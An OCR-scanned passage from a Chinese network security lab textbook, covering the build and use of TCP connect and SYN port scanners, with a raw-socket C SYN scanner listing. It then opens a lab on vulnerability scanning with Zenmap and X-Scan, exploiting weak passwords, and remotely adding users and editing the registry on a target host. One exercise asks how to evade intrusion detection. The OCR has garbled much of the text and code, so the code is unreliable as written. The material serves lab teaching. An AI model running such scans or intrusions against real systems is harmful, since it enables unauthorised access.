
遍历 完成 目标 
端口 扫描 否 ? 


调用 socket 函 数 ， 创 建 流 式 套 接 字 
i 


调用 connect 函 数 ， 尝 试 与 目标 端口 建立 连接 
i 


调用 closesocket 函 数 ， 关 闭 套 接 字 
i 


£14k Winsock) [一 


图 9.4 TCP 全 扫描 开发 流程 


(D 启动 VC++ 6. 0, 选 择 File Open Workspace 菜单 命令 ,加 载 工 程 文件 C:\ 
ExpNIS\NetAD-Lab\ Projects\ HostScan\PortScan\ TCPConnect\ TCPConnect. dsw ,打开 
TCPConnect. cpp 源 文件 。 

(2) 调用 WSAStartup 函数 ,加载 Winsock 库 ( 版 本 2. 2)。 

(3) 创建 流 式 套 接 字 。 
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(4) 填写 sockaddr_in 信息 ,可 使 用 函数 htons 对 端口 信息 进行 网 络 字 节 顺序 转换 。 

(5) 调用 connect 函数 ,尝试 与 目标 端口 建立 连接 ,车 返回 SOCKET_ERROR, 则 表示 
目标 端口 关闭 ;否则 目标 端口 开放 。 

(6) 调用 closesocket 函数 ,关闭 套 接 字 。 

(7) 在 退出 程序 前 卸载 Winsock JE. 

(8) 编译 生成 执行 文件 ,在 “文件 ”菜单 中 选择 Build 命令 ,执行 Rebuild All 编译 源 文 
件 , 生 成 TcpConnect. exe 执行 文件 (TCPConnect\Debug 目录 下 ) ,如 图 9.5 所 示 。 


li C:\ExpNIS\NetAD-Lab\Projects\HostScan\PortScan\ TCPConnect\Debug: inl xi 
XPO RBO SEV KEW TAD WE) | a 
QmBR-O-T|Psk cxt |i o X 9| A 


地 址 (D) [o C:\ExpNIS\NetAD-Lab\Projects|HostScan\PortScan\TCPConnect\Debug x 转 到 


ITCPConnect.exe | 245KB ”应 用 程序 2013-8-13 9:24 A 
© TcPConnect.ik 368 KB Intermediate file 2013-8-13 9:24 A 
© TCPConnect.obj S9KB Intermediate file 2013-8-13 9:24 A 
T2 TCPConnect.pch 6,976 KB Intermediate file 2013-8-13 9:24 A 
© TCPConnect,pdb 577KB Intermediate file 2013-8-13 9:24 A 
T ve60.idb 233KB Intermediate file 2013-8-13 9:24 A 
© vc60.pdb 156KB Intermediate file 2013-8-13 9:24 A 


图 9.5 "EJ TepConnect. exe 执行 文件 


(9) 启动 协议 分 析 器 , 单 击 菜单 中 的 “设置 "一 “定义 过 滤器 "命令 ,在 弹出 的 “定义 过 滤 
器 ”对 话 框 中 选择 “网 络 地 址 ”选项 卡 , 设 置 捕获 本 机 IP 地 址 与 被 扫描 主机 IP 地 址 间 的 数 
Hh. BH IP 数据 选项 如 图 9.6 所 示 。 


OQ Fass TE 


| tO 视图 (WW 设置 (D SOW HMW 
ite J ined 
x 


概要 FERF] 数据 模式 | mins | 


捕获 方式 一 一 一 一 一 一 
地 址 类 型 (D : |Ipv4 z] C RD C WREE 


图 9.6 设置 IP 数据 选项 


选择 “协议 过 滤 ? 选 项 卡 ,选中 PTCP 节点 , 单 击 “确定 ”按钮 完成 过 滤器 设置 。“ 定 义 
过 滤器 ?对 话 框 如 图 9.7 所 示 。 
单 击 * 新 建 捕获 窗口 ”按钮 ,再 单 击 “ 选 择 过 滤器 ”按钮 ,确定 过 滤 信息 。 在 新 建 捕获 窗口 
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[ZIEL 


图 9.7 “定义 过 滤器 "对 话 框 


工具 栏 中 单 击 * 开 始 捕获 数据 包 ? 按 钮 ,开始 捕获 数据 包 。 设 置 好 过 滤器 后 ,过 滤器 信息 摘要 
如 图 9. 8 所 示 。 


iO 视图) 设置) SOW WR) 
ino inines eo) 
LI iE 
embua»»x 


图 9.8 过 滤器 信息 摘要 


(10) 启动 命令 行 控 制 台 (cmd) ,切换 至 TcpConnect. exe 所 在 目录 ,在 命令 提示 符 下 输 
人 命令 “TecpConnect. exe 目的 IP 地 址 起 始 端口 号 结束 端口 号 ”, 其 正确 运行 结果 如 图 9.9 
所 示 。 

协议 分 析 器 停止 捕获 ,本 机 与 被 扫描 主机 间 的 TCP 会 话 如 图 9. 10 和 图 9. 11 所 示 。 将 
图 9. 11 与 图 9. 2 进行 比较 ,并 观察 结果 是 否 正确 。 
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iC: NExpNIS*NetfiD-Lab*Pro jects \HostScan\PortScan\ICPConnect \Debug>TcpConnect .exe 1| 


IC: NExpNIS \NetAD-Lab\Pro jects \HostScan\PortScan\ICPConnect \Debug>,, 


图 9.9 TCP 全 扫描 执行 效果 


© Fifa CE - [文件 窗口 : RET 


A 文件 日” 视图 (WW 设置 (D Bow FW 
08 BAPE MAO 
Na Pu 


Bg TcP 其 它 会 话 
日 -四 172.16.0.84 - 172.16.0.93] 
A 79-9274 


& Mg HTTPS | 
由 网 DN5 会 话 | 
| 


CECCO 


S DOCU s 


Bay ARP 会 话 
Bg wIN5 会 话 


CECCO 


用 


图 9.10 TCP 会话 


172.16.0.84 172.16.0.93 172.16.0.84 172.16.0.93 
(9) (9274) (80) (9275) 
ES 102 svn 109 
103 [ACK pgy 110 ACK Syy 
> - 
"IN 104 ack. "m 
le - 
105 4CKRs7 acK ER 112 
- M 
s 10 13 ack 
| | 
108 ACK psy 114 | 一 4ckasy 
e| = 


K 9.11 TCP 端口 关闭 与 开放 


9.5.2 TCP SYN 扫描 


CD 启动 VC++ 6. 0. 3E #E File Open Workspace 菜单 命令 ,加 载 工程 文件 C:N 
ExpNIS\ NetAD-Lab \ Projects \ HostScan \ PortScan V TCPSYN \ TCPSYN. dsw, 打开 
TCPSYN. cpp 5 ProtoHeader. h X fft. 


网 络 安全 与 管理 实验 教程 


(2) 填写 WSAStartup 函数 ,加 载 Winsock 库 ( 版 本 2. 2) 。 

(3) 填写 WSASocket 函数 ,创建 原始 套 接 字 

说 明 : 流 式 套 接 字 程 序 ,在 于 目 tt 口 扫描 时 ,其 必须 经 过 TCP 3 次 握手 过 
程 ,而 TCP SYN 端口 扫描 时 恰恰 没有 TCP 3 次 握手 的 过 程 ,因此 需要 基于 IP 层 构 造 TCP 
数据 包 , 实 现 端口 扫描 。 

(4) 填写 bind 函数 ,关联 本 地 一 个 地 址 到 套 接 字 

(5) 填写 sendto 函数 ,在 原始 套 接 字 上 发 送 数据 。 

(6) 填写 recvfrom 函数 ,在 原始 套 接 字 上 接收 数据 。 

(7) 编译 生成 执行 文件 ,在 “文件 ”菜单 中 选择 Build 命令 ,执行 Rebuild All 编译 ; 
件 , 生 成 TcpSYN. exe 执行 文件 (TcpSYN\Debug 目录 下 ), 如 图 9.12 所 示 。 


fie C:\ExpNIS\NetAD-Lab \Projects\HostScan\PortScan\TCPSYN\Debug 
文件 (E) ”编辑 (E) SEW dum) IAD hw 


ORE-O- 7 | PRR xtX | is o» x 1)| 0 
地 址 (D) lo C:\ExpNIS|NetAD-Lab\Projects\HostScan\PortScan\TCPSYN\Debug 


名 称 < 属 | 
Fitcpsyn.exe | 525 KB ”应 用 程序 2013-8-13 15:10 A 
© TCPSYN.ik 771KB Intermediate file 2013-8-13 15:10 A 
D TCPSYN.obj 173KB Intermediate file. 2013-8-13 15:10 A 
局 TCPSYN.pch 7291KB Intermediate file 2013-8-13 15:10 A 
© TCPSYN.pdb. 1081KB Intermediate file 2013-8-13 15:10 A 
D vcé0.idb 249KB Intermediate file 2013-8-13 15:10 A 
D vc60.pdb 164KB Intermediate file 2013-8-13 15:10 A 


图 9.12 生成 TcpSYN. exe 执行 文件 


(8) 启动 协议 分 析 器 , 单 击 菜单 中 的 “设置 ”一 “定义 过 滤器 ”命令 ,在 弹出 的 “定义 过 滤 
器 ”对 话 框 中 选择 “网 络 地 址 ”选项 卡 , 设 置 捕获 本 机 IP 地 址 与 被 扫描 主机 IP isi 间 的 数 
据 ; 选 择 “ 协 议 过 滤 ” 选 项 卡 , 选 中 IP 一 TCP 节点 , 青 单 击 “ 确 定 ” 按 钮 完成 过 滤器 设 

单 击 “ 新 建 捕获 窗口 "按钮 ,再 单 击 “ 选 择 过 滤器 ”按钮 ,确定 过 滤 信 息 。 pipice m H 
CRA rp d; F 6 8 BR A GL" Pc F T6 dil CRUS GL o 

(9) 启动 命令 行 控制 台 (cmd) ,切换 至 TcpSYN. exe 所 在 目录 ,在 命令 提示 符 iioii 
4"TCPSYN. exe 目的 IP 地 址 起 始 端口 号 结束 端口 号 ”。 其 正确 运行 结果 如 图 9. 
所 示 。 


iC: \ExpNIS>cd \ExpNIS\NetAD-Lab\Projects\HostScan\PortScan\ICPSYN\Debug 


iC: \ExpNIS \WNetAD-Lab\Pro jects \HostScan\PortScan\ICPSYN\Debug>TCPSYN.exe 172.16.8. 


: 172.16.0.84 eo. sa 开放 | 


iC: \ExpNIS \WNetAD-Lab\Pro jects ostScan\PortScan\ICPSYN\Debug> 


图 9.13 TCP SYN 执行 效果 


协议 分 析 器 停止 捕获 ,本 机 与 被 扫描 主机 间 的 TCP 会 话 如 图 9.14 所 示 。 将 图 9. 14 与 
图 9. 3 进行 比较 。 并 观察 实验 结果 是 否 正确 。 
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172.16.0.93 172.16.0.84 172.16.0.93 
(80) 


(7654) (7654) 


图 9.14 TCP 端口 关闭 与 开放 


下 面 是 一 个 TCP SYN 扫描 的 例 程 ,程序 有 两 个 子 线程 : SendThread 用 于 发 送 SYN 报 
文 段 ;RecvThread 用 于 接收 SYN | ACK 报 文 段 ,并 从 中 获取 相应 的 处 于 LISTEN 状态 的 
端口 。 

#include< ws2tcpip-h> 

#include< winsock2.h> 

#include< stdio.h> 


#pragra comment (lib, "ws2 32.1ib") 


*define SIO RCVALL. WSAIOW(IOC VENDOR, 1) 


#define RECV BUF SIZE 1024; // 接 收 缓冲 区 大 小 
#define SOURCE FORT 8088 // 本 地 TcP 段 源 端口 
#define TCP RIT 2000 // 来 回 时 间 ,以 ms 为 单位 


typedef struct iphdr 
t 

unsigned char h verlen; 
unsigned char tos; 

unsigned short total len; 
unsigned short ident; 

unsigned short frag amd flags; 
unsigned char ttl; 

unsigned char proto; 

unsigned short checksum; 
unsigned int scurceIP; 
unsigned int destIP; 
}IP_HEALER; 


typedef struct psdhdr // XL TCP 伪 首部 
{ 
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unsigned long saddr; // 源 地 址 
unsigned long daddr; // 目 的 地 址 
char nbz; 

char ptcl; // 协 议 类 型 
unsigned short topl; /acp 长 度 
)PSD HEADER; 


//Standard TCP flags 
#define URG 0x20 
#define ACK 0x10 
#define PSH 0x08 
#define RST 0x04 
#define SYN 0x02 
#define FIN 0x01 


typedef struct tcphdr // X. TcP 首 部 

{ 

USHORT th sport; //16 位 源 端口 

USHORT th dort; //16 位 目的 端口 
unsigned int th seg; //32 位 序列 号 

unsigned int th ack; /[32 位 确认 号 

unsigned char th lenres; //4 位 首部 长 度 /6 位 保留 字 
unsigned char th flag; /6 位 标识 位 

USHORT th win; //16 位 窗口 大 小 
USHORT th sum; //16 位 校 验 和 

USHORT th urp; //16 位 紧急 数据 偏 移 量 
)TCP HEADER; 


USHORT checksum(USHORT * buffer, int size) 
t 

unsigned long cksum- 0; 

while (size> 1) 

t 

Cksumt = * buffert ; 

size -= sizeof (USHORT) ; 

} 

if (size) 

t 

cksum+ = * (UCHAR* )buffer; 

} 

Cksum- (cksum> > 16)+ (cksum & Oxffff); 
Cksumt = (cksum> > 16); 

return (USHORT) («cksum) ; 

$ 
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void useage () 

t 

printf ("ICP SYN Port Scanner n") ; 

printf ("\t Email : moogates@ 163.net\n"); 

printf ("\t Useage: * .exe Target ip [start port] [end port].\n"); 
} 


SOCKET g_sock; // 用 于 收发 IceP 报 文 段 的 全 局 socket 
hostent* g pHost; 

unsigned int g nStartPort,g nEndFort; 

void RecvThread(char* sAddr) 

t 

char RecvBuf [RECV_BUF SIZE]; 

IP HEALER* ip; 

TCP HEADER * tcp; 

while(1) 

t 

int ret-recv(g sock, RecvBuf, FECV BUF SIZE, 0); 

if (ret> 0) 

t 

ip- (IP HEADER * )RecvBuf; 

tcp- (TCP. HEADER * ) (RecvBuf+ (ip- >h_verlens0x0f) * 4); 


if (ip- > proto!= IPPROTO TCP) 

continue; 

if (stromp (sAddr, inet_ntoa(* (in_addr * )&ip-» sourceIP))) 
continue; 

if(tcp-» th flagsSYN && tcp- > th flagsACK) 
printf ("Port$6u OPEN. Wn",ntchs (tcp- > th. sport)); 
} 

} 

} 

void SendThread(char* sAddr) 

{ 

SOCKADIR IN addr dst; 

char szSendBuf [60]= {0}; 

IP HEATER ipHeader; 

TCP HEADER tcpHeader; 

PSD HEADER psdHeader; 

// 要 发 送 的 目的 地 址 

addr dst.sin family- AF INET; 

addr dst.sin addr.S un.S addr inet addr (sAddr) ; 


TCP 端 口 扫描 
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// 填 充 下 首部 

ipHeader.h verlen- (KK <4 | sizeof (ipHeader)/4); 

ipHeader.tos- 0; 

ipHeader.total len- htons (sizeof (ipHeader)+ sizeof (tqpHeader) ) ; 
ipHeader.ident- 1; 

ipHeader.frag and flags- 0; 

ipHeader.ttl- 128; 

ipHeader.proto- IPFFOTO TCP; 


ipHeader.sourceIP= * (int* )g pHost- >h addr list[0]; 
ipHeader.destIP- inet adir (sAddr) ; 


// 填 充 TcP 首 部 

tcpHeader.th sport- htons (SOURCE FORT); // 源 端口 号 
tcpHeader.th_secF htonl (0x12345678) ; 

tcpHeader.th ack- 0; 

tcpHeader.th lenres- (sizeof (topHeader) /4« < 40) ; 

tcpHeader.th flag- SYN; // 发 送 SING SC EE 
tcpleader.th win- htons (512) ; 

tcpHeader.th urp- 0; 


pedHeader.saddr= ipHeader.sourceIP; 
pedHeader .daddr= ipHeader dest IP; 
psdieader .mibz= 0; 

psdleader.ptcl- IPPROTO TCP; 
pedHeader.tapl= htons (sizeof (tqpHeader) ) ; 


for(unsigned int nPort-g nStartPort; nPort ( 
ipHeader.checksum- 0; 

tcpHeader.th sume 0; 

tcpHeader.th dport- htons (nPort) ; 


// 计 算 TcP 校 验 和 

memcpy(szSendBuf, &psdHeader, sizeof (psdHeader)); 

memcpy (szSendBuf+ sizeof (psdHeader), &tcpHeader, sizeof (tqpHeader) ); 
tcpHeader.th sume checksum ( (USHORT * ) szSendBuf, sizeof (psdHeader)+ sizeof (tqpHeader) ) ; 


// 计 算 re ER 

memcpy(szSendBuf, &ipHeader, sizeof (ipHeader)); 

memcpy (szSendBuf+ sizeof (ipHeader), &tcpHeader, sizeof (tqpHeader) ) ; 

memset (szSendBuf+ sizeof (ipHeader)+ sizeof (tqpHeader), 0, 4); 

ipHeader.checksum- checksum ( (USHORT * )szSendBuf, sizeof (ipHeader)+ sizeof (tqpHeader) ) ; 


memcpy (szSendBuf, &ipHeader, sizeof (ipHeader) ); 
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addr dst.sin port-htons (nPort) ; 

int ret- sendto(g sock, szSendBuf, sizeof (ipHeader)+ sizeof (tcpHeader) , 
0, (struct sockaddr * )&addr dst, sizeof (adir dst)); 

} 

// 等 待 一 个 合适 的 REIT 周期 .RIT 太 小 可 能 导致 被 扫描 主机 端口 的 SANIacK 报 文 来 不 及 接收 
Sleep(ICP RIT); 

} 

int main(int argc,char* argv[]) 

{ 

if (argc« 2) 

t 

useage () 

retum 0; 

H 

WSADATA WSAData; 

if (WSAStartup (MAKEWORD (2,2), &WSAData) != 0) 

{ 

printf ("WSAStartup Error!\n"); 

retum - 1; 

H 

if ((g sock-WSASocket(AF INET,SOCK RAW, IPPROTO RAW, 
NULL,O,WSA FLAG OVERLAPPED) )== INVALID SOCKET) 

t 

printf ("Socket Setup Error! Wn") ; 

retum -1; 

} 

BOOL flag= true; 

// 包 含 下 头 部 , 即 程 序 自 己 封 装 下 头 部 ,接收 的 数据 报 中 也 包含 IPOD 
if(setsockopt(g sock,IPPROTO IP,IP HDRINCL, (char * )&flag, 
sizeof (flag) )== SOCKET ERROR) 

{ 

printf ("setsockopt IP_HDRINCL error!\n"); 

retum - 1; 

} 


// 将 本 主机 的 下 地 址 赋 给 源 IP 
char sLocalName [64]; 


gethostname((char* )sLocalName, sizeof (sLocalName)- 1); 
g pHost- gethostbyname (sLocalName) ; 


// 填 充 SOCKADDR_IN Si #49 
sockaddr in addr local; 
addr local.sin addr- * (in addr* )g pHost- >h addr list[0]; 


TOP 端口 扫描 
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addr local.sin family- AF INET; 
addr local.sin port= htons (SOURCE PORT); 


// 把 原始 套 接 字 sock 绑 定 到 本 地 网 卡 地 址 上 

if(bind(g sock, (PSOCKADER)&addr local, sizeof (sockaddr in))== SOCKET ERROR) 
{ 

printf ("Bind Error:%d.\n",WSAGetLastError ()) ; 

WSACleanup () 7 

retum - 1; 

} 


// 设 置 SOCK RAW 为 SIO ECVALL 混合 模式 ), 以 便 接 收 所 有 的 IP (2 
DWORD dWValue- 1; 
ioctlsocket(g sock, SIO RCVALL, &dWValue); /adwalue 为 1 时 执行 ,为 0 时 取消 


// 发 送 超时 计时 

int nTimeOut= 500; 

if (setsockopt (g_sock, SOL SOCKET,SO SNDTIMED, 

(char * )&nTimeOut, sizeof (nTimeOut))- — SOCKET FRROR) 
t 

printf("setsockopt SO SNDTIMED error!\n") ; 

retum -1; 

} 


g_nStartPort= argc>=3 ? atoi (argv[2]) : 1; 
g_nEndPort= argc>=4 ? atoi(argv[3]) : 65535; 


printf ("Scanningts from port&d to%d-- \n",argv[1],g_nStartPort,g_nEndPort) ; 
HANDLE threads [2]; 

threads [0]= CreateThread (NULL, 0, 
(LETHFEAD START ROUTINE)RecvThread, 

(LPVOID) argv [1] , 0, NULL) ; 

threads [1]= CreateThread (NULL, 0, 
(LETHFEAD START ROUTINE) SendIhread, 

(LEVOID)argv[1], //destination IP address0, NULL) ; 
WaitForMiltipledbjects (2, threads, FALSE, INFINITE) ; 

printf ("Scan camplete.\n",argv[1],g_nStartPort,g_nEndFort) ; 
closesocket(g sock); 

WSACLeanup () ; 

retum 0; 

} 


9.6 思考 问题 
1. 分 别 在 下 述 两 种 情况 下 对 未 开放 的 TCP 端口 进行 全 扫描 。 
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(1) 防火 墙 禁 止 对 该 端口 进行 访问 。 

(2) 防火 墙 允许 对 该 端口 进行 访问 。 

扫描 与 被 扫描 主机 间 的 TCP 会 话 有 何不 同 ? 

2. 选择 一 种 端口 扫描 工具 ,查看 网 络 上 的 一 台 主 机 ,这 台 主 机 运行 的 是 什么 操作 系统 ? 
该 主机 提供 了 哪些 服务 ? 

3. 如 果 存 在 人 侵 检测 系统 IDS, 能 否 把 扫描 方式 设计 得 更 巧妙 一 些 , 使 IDS 不 会 报警 ? 
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10.1 实验 目的 与 要 求 


。 掌握 漏洞 扫描 技术 的 原理 。 

。 熟悉 X-Scan,Zenmap 工具 的 使 用 方法 。 

。 会 使 用 工具 查找 主机 漏洞 。 

。 学 会 对 弱 口令 的 利用 。 

。 了 解 开 启 主机 默认 共享 以 及 在 命令 提示 下 开启 服务 的 方法 。 
。 通过 实验 了 解 如 何 提高 主机 的 安全 性 。 


10.2 实验 环境 


在 VMWare 虚拟 机 中 安装 操作 系统 Windows 2003 ,在 交换 网 络 结构 下 ,每 组 两 人 ,使 
用 Zenmap 和 X-Scan 及 远程 桌面 。 


10.3 背景 知识 


10.3.1 漏洞 扫描 技术 


漏洞 扫描 是 一 种 网 络 安全 扫描 技术 , 它 基 于 局 域 网 或 Internet 远程 检测 目标 网 络 或 主 
机 安全 性 。 通 过 漏洞 扫描 ,系统 管理 员 能 够 发 现 所 维护 的 Web 服务 器 的 各 种 TCP/IP 端口 
的 分 配 , 开 放 的 服务 、Web 服务 软件 版 本 和 这 些 服务 及 软件 呈现 在 Internet. 上 的 安全 漏洞 。 
漏洞 扫描 技术 采用 积极 的 、 非 破坏 性 的 办 法 来 检验 系统 是 否 含有 安全 漏洞 。 网 络 安全 扫描 
技术 与 防火 墙 `. 安 全 监控 系统 互相 配合 使 用 ,能 够 为 网 络 提供 很 高 的 安全 性 。 

漏洞 扫描 分 为 利用 漏洞 库 的 漏洞 扫描 和 利用 模拟 攻击 的 漏洞 扫描 。 利 用 漏洞 库 的 漏洞 
扫描 包括 CGI 漏洞 扫描 、POP3 漏洞 扫描 、FTP 漏洞 扫描 ,SSH 漏洞 扫描 和 HTTP 漏洞 扫 
描 等 。 利 用 模拟 攻击 的 漏洞 扫描 包括 Unicode 遍历 目录 漏洞 探测 .FTP 弱 口 令 探测 、 
OPENRelay 邮件 转发 漏洞 探测 等 。 

目前 ,漏洞 扫描 具有 多 种 实现 方法 。 

1. 漏洞 库 匹 配 法 

基于 漏洞 库 的 漏洞 扫描 ,通过 采用 漏洞 规则 匹配 技术 完成 扫描 。 漏 洞 库 是 通过 以 下 途 
径 获 取 的 : 安全 专家 对 网 络 系统 的 测试 .黑客 攻击 案例 的 分 析 以 及 系统 管理 员 对 网 络 系统 
安全 配置 的 实际 经 验 。 漏 洞 库 信息 的 完整 性 和 有 效 性 决定 了 漏洞 扫描 系统 的 功能 ,漏洞 库 
应 定期 修订 和 更 新 。 

2. 插件 技术 (功能 模块 技术 ) 

插件 是 由 脚本 语言 编写 的 子 程序 ,扫描 程序 可 以 通过 调用 它 来 执行 漏洞 扫描 ,检测 系统 
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中 存在 的 漏洞 。 插 件 编写 规范 化 后 ,用 户 可 以 自 定义 新 插件 来 扩充 漏洞 扫描 软件 的 功能 。 
这 种 技术 使 漏洞 扫描 软件 的 升级 维护 变 得 相对 简单 。 

通常 账户 包含 用 户 名 及 对 应 的 口令 。 当 口令 使 用 简单 的 数字 和 字母 组 合 时 ,非常 容易 
破解 , 称 这 种 口令 为 弱 口 令 。X-Scan 工具 中 涵盖 了 很 多 种 弱 口 令 扫 描 方法 ,包括 FTP. 
SMTP,SSH,POP3,.IMAP,TELNET,WWW 等 。 为 消除 弱 口 令 产生 的 安全 隐患 ,需要 设 
置 复杂 的 密码 ,并 养 成 定期 更 换 密码 的 良好 习惯 。 复 杂 的 密码 包含 数字 .字母 (大 写 或 小 写 ) 
及 特殊 字符 等 ,如 123 $ ?6^jless2008 或 123 $ ?6^]LCSS2008, 

Windows 系统 存在 一 个 拒绝 服务 漏洞 ,因为 Windows 默认 开启 的 Microsoft-DS 端口 
(TCP 445) 人 允许 远程 用 户 连接 。 当 远程 用 户 发 送 一 个 非法 的 数据 包 到 Microsoft-DS 端口 
(TCP 445) 时 ,核心 资源 被 LANMAN 服务 占用 ,导致 拒绝 服务 攻击 ,造成 蓝屏 。 如 一 个 攻 
击 者 发 送 一 个 连续 的 10K 大 小 的 NULL 字 串 数据 流 给 TCP 端口 445 时 ,引起 的 最 常见 的 
症状 是 LANMAN 服务 将 占用 大 量 的 核心 内 存 , 计 算 机 发 出 * 咬 、 叶 、 跑 …… ”的 告警 声 将 被 
声卡 驱动 无 法 装载 的 错误 状态 所 替代 ,IIS 不 能 为 ASP 的 页 面 服务 ,作为 管理 员 去 重启 服务 
器 时 ,系统 将 会 显示 你 没有 权限 关闭 或 重启 计算 机 。 严 重 的 话 ,以 后 计算 机 只 要 一 打开 ,就 
会 自动 消耗 100% 的 CPU 资源 ,根本 无 法 进行 正常 的 工作 ,而 且 很 难 恢复 过 来 。 


10.3.2 漏洞 扫描 工具 


X-Scan 是 国内 最 著名 的 综合 扫描 器 之 一 , 它 把 扫描 报告 和 安全 焦点 网 站 相连 接 ,对 扫 
描 到 的 每 个 漏洞 进行 “风险 等 级 ”评估 ,并 提供 漏洞 描述 、 漏 洞 溢出 程序 ,方便 网 管 测试 .修补 
漏洞 ,X-Scan 采用 多 线程 方式 对 指定 IP 地 址 段 ( 或 单机 ) 进 行 安全 漏洞 检测 ,支持 插件 功 
能 ,提供 了 图 形 界面 和 命令 行 两 种 操作 方式 ,扫描 内 容 包 括 远程 操作 系统 类 型 及 版 本 ,标准 
端口 状态 及 端口 BANNER 信息 .CGI 漏洞 IIS 漏洞 .RPC 漏洞 .SQL-Server、FTP-Server、 
SMTP-Server, POP3-Server, NT-Server 弱 口 令 用 户 ,NT 服务 器 NetBIOS 信息 等 。 扫 描 结 
果 保 存在 /log/ 目 录 中 ,index_* . htm 为 扫描 结果 索引 文件 。Telnet 协议 为 用 户 提供 了 在 本 
地 计算 机 上 完成 远程 主机 工作 的 能 力 。 在 终端 使 用 者 的 计算 机 上 使 用 Telnet 程序 ,用 它 连 
接 到 服务 器 。 终 端 使 用 者 可 以 在 Telnet 程序 中 输入 命令 ,这 些 命令 会 在 服务 器 上 运行 ,就 
像 直 接 在 服务 器 的 控制 台 上 输入 一 样 。 可 以 在 本 地 控制 服务 器 。 要 开始 一 个 Telnet Zi. 
必须 输入 用 户 名 和 密码 来 登录 服务 器 。 它 的 一 些 较 新 的 版 本 在 本 地 能 够 执行 更 多 的 处 理 ， 
并 且 减 少 了 通过 链 路 发 送 到 远程 主机 的 信息 数量 。 

Zenmap 是 Linux, FreeBSD, UNIX, Windows 下 的 网 络 扫描 和 嗅 探 工具 包 ,其 基本 功能 
有 3 个 : 一 是 探测 一 组 主机 是 否 在 线 :二 是 扫描 主机 端口 , 嗅 探 所 提供 的 网 络 服务 ;三 是 可 
以 推断 主机 所 用 的 操作 系统 。Zenmap 不 仅 可 用 于 扫描 仅 有 两 个 节点 的 LAN, 而 且 还 可 以 
扫描 500 个 节点 以 上 的 网 络 。Zenmap 还 允许 用 户 定制 扫描 技巧 。 通 常 ,一 个 简单 的 使 用 
ICMP 协议 的 ping 操作 可 以 满足 一 般 需 求 ; 也 可 以 深入 探测 UDP 或 者 TCP 端口 ,直至 主 
机 所 使 用 的 操作 系统 ;还 可 以 将 所 有 探测 结果 记录 到 各 种 格式 的 日 志 中 , 供 进一步 分 析 
操作 。 

Zenmap 不 仅 能 快速 标识 出 存活 的 主机 ,将 这 些 主机 上 开放 的 端口 及 端口 关联 的 服务 
全 部 列 出 ,而 且 不 管 目标 是 否 修改 了 系统 ICMP 响应 的 TTL 值 , 它 都 可 以 正确 地 识别 出 目 
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标 操作 系统 的 类 型 ,甚至 使 用 相应 的 扫描 参数 ,Zenmap 还 能 穿 透 对 方 的 防火 墙 ,并 且 它 还 
有 一 些 特殊 的 扫描 参数 能 够 让 它 的 扫描 活动 不 会 被 对 方 的 安全 设备 记录 下 来 ,方便 攻击 者 
逃避 责任 。Zenmap 可 以 在 字符 终端 下 通过 命令 来 完成 指定 扫描 任务 ,但 是 这 种 方式 需要 
记 住 它 数 量 众多 的 扫描 参数 ,使 用 起 来 不 是 很 直观 ,但 灵活 性 高 。 如 果 扫 描 任 务 不 是 很 复 
杂 , 完 全 可 以 使 用 Zenmap 的 图 形 前 端 来 进行 。 


10.3.3 Telnet 命令 


Telnet 协议 是 TCP/IP 协议 簇 中 的 一 员 , 是 Internet 远程 登录 服务 的 标准 协议 和 主要 
方式 。 它 为 用 户 提 供 了 在 本 地 计算 机 上 完成 远程 主机 工作 的 能 力 。 在 终端 使 用 者 的 计算 机 
上 使 用 Telnet 程序 ,用 它 连接 到 服务 器 。 终 端 使 用 者 可 以 在 Telnet 程序 中 输入 命令 ,这 些 
命令 会 在 服务 器 上 运行 ,就 像 直接 在 服务 器 的 控制 台 上 输入 一 样 。 可 以 在 本 地 控制 服务 器 。 
要 开始 一 个 Telnet 会 话 , 必 须 输 入 用 户 名 和 密码 来 登录 服务 器 。 

Telnet 是 常用 的 远程 控制 Web 服务 器 的 方法 , 它 最 初 是 由 ARPANet 开发 的 ,但 是 现 
在 它 主要 用 于 Internet 会 话 。 它 的 基本 功能 是 允许 用 户 登录 进入 远程 主机 系统 。 起 初 , 它 
只 是 让 用 户 的 本 地 计算 机 与 远程 计算 机 连接 ,从 而 成 为 远程 主机 的 一 个 终端 。 它 的 一 些 较 
新 的 版 本 在 本 地 执行 更 多 的 处 理 , 于 是 可 以 提供 更 好 的 响应 ,并且 减 少 了 通过 链 路 发 送 到 远 
程 主机 的 信息 数量 。 

使 用 Telnet 协议 进行 远程 登录 时 需要 满足 以 下 条 件 : 在 本 地 计算 机 上 必须 装 有 包含 
Telnet 协议 的 客户 程序 ;必须 知道 远程 主机 的 TP 地 址 或 域名 ;必须 知道 登录 标识 与 口令 。 

Telnet 远程 登录 服务 分 为 以 下 4 个 过 程 ， 

(1) 本 地 与 远程 主机 建立 连接 。 该 过 程 实际 上 是 建立 一 个 TCP 连接 ,用 户 必须 知道 远 
程 主机 的 IP 地 址 或 域名 。 

(2) 将 本 地 终端 上 输入 的 用 户 名 和 口令 及 以 后 输入 的 任何 命令 或 字符 以 NVT(Net 
Virtual Terminal) 格 式 传送 到 远程 主机 。 该 过 程 实际 上 是 从 本 地 主机 向 远程 主机 发 送 一 个 
IP 数据 包 。 

(3) 将 远程 主机 输出 的 NVT 格式 的 数据 转化 为 本 地 所 接受 的 格式 送 回 本 地 终端 ,包括 
输入 命令 回 显 和 命令 执行 结果 。 

(4) 本 地 终端 对 远程 主机 进行 撤销 连接 。 该 过 程 是 撤销 一 个 TCP 连接 。 


10.4 实验 内 容 
使 用 扫描 工具 对 受 攻击 主机 进行 两 轮 扫 描 , 得 到 受 攻击 主机 的 开放 端口 和 账户 信息 ;使 


用 账户 信息 远程 登录 受 攻击 主机 ,并 对 受 攻 击 主机 进行 修改 注册 表 、 添 加 新 用 户 和 添加 磁盘 
映射 等 ,达到 修改 、 增 加、 删除 受 攻击 主机 磁盘 内 容 的 目的 。 


10.5 实验 步骤 


本 练习 主机 A.B 为 一 组 ,实验 角色 说 明 如 表 10-1 所 示 。 


表 10-1 实验 角色 说 明 
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实验 主机 实验 角色 系统 环境 
A 攻击 方 Windows 
B 受 攻击 主机 Windows 


初步 扫描 


Scan Tools Profile Help 


CD 主机 A 单 击 工具 栏 中 的 Zenmap 按钮 启动 Zenmap 工具 ,在 弹出 窗口 中 的 Target 
中 输入 同 组 主机 B 的 IP 地 址 ,在 Profile 中 下 拉 列 表 框 中 选择 Intense scan 选项 , 单 击 右 侧 
的 Scan 按钮 ,开始 扫描 。 具 体 设置 如 图 10. 1 所 示 。 


maa 


Target; | 172.16.0.74 w| Profile: | Intense scan - ] 


Command: |nmap -T4 -A -v -PE -P522,25,80 -PA21,23,80,3389 172.16.0.74 

